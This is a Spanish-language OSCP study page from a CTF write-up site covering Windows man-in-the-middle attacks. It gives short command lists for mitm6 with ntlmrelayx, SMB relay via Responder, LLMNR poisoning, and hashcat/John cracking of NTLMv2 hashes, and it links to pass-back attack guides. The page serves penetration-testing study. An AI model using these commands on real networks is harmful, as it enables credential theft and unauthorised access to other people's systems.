xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • MITM6
  • SMBRelay
  • LLMNR
  • Pass-Back Attack
  1. Apuntes y recursos OSCP
  2. Windows

Ataques MITM

AnteriorWindows PrivescSiguienteEnumeración Post-Explotación

Última actualización hace 1 año

MITM6

sudo python3 mitm6.py -d domain.local
impacket-ntlmrelayx -6 -t ldaps://<IP_DC> -wh <fakewpad>.domain.local -l lootme

SMBRelay

#Comprobando firmas SMB
crackmapexec smb 10.0.2.6
nmap -p 445 --script smb2-security-mode <IP> -Pn
#Ataque con Responder
#Editar el archivo de configuración de Responder y desactivar las opciones SMB y HTTP -> /etc/responder/Responder.conf
sudo responder -I eth0 -dw
impacket-ntlmrelayx -t <IP_VÍCTIMA> -smb2support
#(Actualizar este punto porque parece que los comandos y la ejecución está bastante deprecada)

LLMNR

#Responder
sudo responder -I eth0 -dw
#Cracking NTLMv2 con Hashcat
hashcat -m 5600 <HASH_FILE> /usr/share/wordlists/rockyou.txt
#Alternativa con John
john --wordlist=/usr/share/wordlists/rockyou.txt -rules /usr/share/john/rules/best64.rule <HASH_FILE>

Pass-Back Attack

The worst of both worlds: Combining NTLM Relaying and Kerberos delegationdirkjanm.io
How to Hack Through a Pass-Back Attack: MFP Hacking Guide
Logo